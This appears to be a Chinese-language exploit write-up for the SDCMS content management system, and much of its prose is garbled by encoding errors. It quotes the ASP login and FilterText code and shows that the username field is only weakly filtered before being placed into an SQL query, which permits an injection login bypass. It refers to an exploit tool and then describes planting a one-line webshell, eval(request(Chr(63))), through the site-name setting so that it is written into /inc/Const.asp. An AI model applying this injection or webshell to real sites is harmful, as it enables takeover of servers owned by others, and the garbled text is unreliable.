SDCMSͨɱ©ùȨSHELL
ߣT00LS©ļ̨Ŀ¼/index.asp
Sub Check
Dim username,password,code,getcode,Rs
IF Check_post Then Echo "1ֹⲿύ!":Exit Sub
username=FilterText(Trim(Request.Form("username")),1)
password=FilterText(Trim(Request.Form("password")),1)
code=Trim(Request.Form("yzm"))
getcode=Session("SDCMSCode")
IF errnum>=loginnum Then Echo "ϵͳѽֹٵ¼":died
IF code="" Then Alert "֤벻Ϊգ","javascript:history.go(-1)":Died
IF code<>"" And Not Isnumeric(code) Then Alert "֤Ϊ֣","javascript:history.go(-1)":Died
IF code<>getcode Then Alert "֤","javascript:history.go(-1)":Died
IF username="" or password="" Then
Echo "û벻Ϊ":Died
Else
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
IF Rs.Eof Then
AddLog username,GetIp,"¼ʧ",1
Echo "û,ջ "&loginnum-errnum&" λ"
Else
Add_Cookies "sdcms_id",Rs(0)
Add_Cookies "sdcms_name",username
Add_Cookies "sdcms_pwd",Rs(2)
Add_Cookies "sdcms_admin",Rs(3)
Add_Cookies "sdcms_alllever",Rs(4)
Add_Cookies "sdcms_infolever",Rs(5)
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
AddLog username,GetIp,"¼ɹ",1
'Զɾ30ǰLog¼
IF Sdcms_DataType Then
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
Else
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
End IF
Go("sdcms_index.asp")
End IF
Rs.Close
Set Rs=Nothing
End IF
End Sub
ǿԿusernameͨFilterText˵ġǿFilterTextĴ
Function FilterText(ByVal t0,ByVal t1)
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
t0=Trim(t0)
Select Case t1
Case "1"
t0=Replace(t0,Chr(32),"")
t0=Replace(t0,Chr(13),"")
t0=Replace(t0,Chr(10)&Chr(10),"")
t0=Replace(t0,Chr(10),"")
Case "2"
t0=Replace(t0,Chr(8),"")'ظ
t0=Replace(t0,Chr(9),"")'tab(ˮƽƱ)
t0=Replace(t0,Chr(10),"")'
t0=Replace(t0,Chr(11),"")'tab(ֱƱ)
t0=Replace(t0,Chr(12),"")'ҳ
t0=Replace(t0,Chr(13),"")'س chr(13)&chr(10) سͻе
t0=Replace(t0,Chr(22),"")
t0=Replace(t0,Chr(32),"")'ո SPACE
t0=Replace(t0,Chr(33),"")'!
t0=Replace(t0,Chr(34),"")'"
t0=Replace(t0,Chr(35),"")'#
t0=Replace(t0,Chr(36),"")'$
t0=Replace(t0,Chr(37),"")'%
t0=Replace(t0,Chr(38),"")'&
t0=Replace(t0,Chr(39),"")''
t0=Replace(t0,Chr(40),"")'(
t0=Replace(t0,Chr(41),"")')
t0=Replace(t0,Chr(42),"")'*
t0=Replace(t0,Chr(43),"")'+
t0=Replace(t0,Chr(44),"")',
t0=Replace(t0,Chr(45),"")'-
t0=Replace(t0,Chr(46),"")'.
t0=Replace(t0,Chr(47),"")'/
t0=Replace(t0,Chr(58),"")':
t0=Replace(t0,Chr(59),"")';
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
t0=Replace(t0,Chr(63),"")'?
t0=Replace(t0,Chr(64),"")'@
t0=Replace(t0,Chr(91),"")'\
t0=Replace(t0,Chr(92),"")'\
t0=Replace(t0,Chr(93),"")']
t0=Replace(t0,Chr(94),"")'^
t0=Replace(t0,Chr(95),"")'_
t0=Replace(t0,Chr(96),"")'`
t0=Replace(t0,Chr(123),"")'{
t0=Replace(t0,Chr(124),"")'|
t0=Replace(t0,Chr(125),"")'}
t0=Replace(t0,Chr(126),"")'~
Case Else
t0=Replace(t0, "&", "&")
t0=Replace(t0, "'", "'")
t0=Replace(t0, """", """)
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
End Select
IF Instr(Lcase(t0),"expression")>0 Then
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
End If
FilterText=t0
End Function
ûֱӲ1 ֻ
t0=Replace(t0,Chr(32)," ")
t0=Replace(t0,Chr(13),"")
t0=Replace(t0,Chr(10)&Chr(10),"
")
t0=Replace(t0,Chr(10),"
")
©¿ֱǫ̃ʺ롣SDCMSĬϺַ̨/admin/վ˺̨·,ôв!
EXPù (˹ֻXP):sdcms-EXP
:
빤֤,ȻOK
ֱӽ̨,Ǻ!
ֱӽ̨ˡ
SDCMSȨ:
1ʣ/̨Ŀ¼/sdcms_set.asp վƣӸ :eval(request(Chr(63)))ɣֱдһ仰ȥ д뵽/inc/Const.asp һ仰?
OK,ò˵!
ҳ:
[1]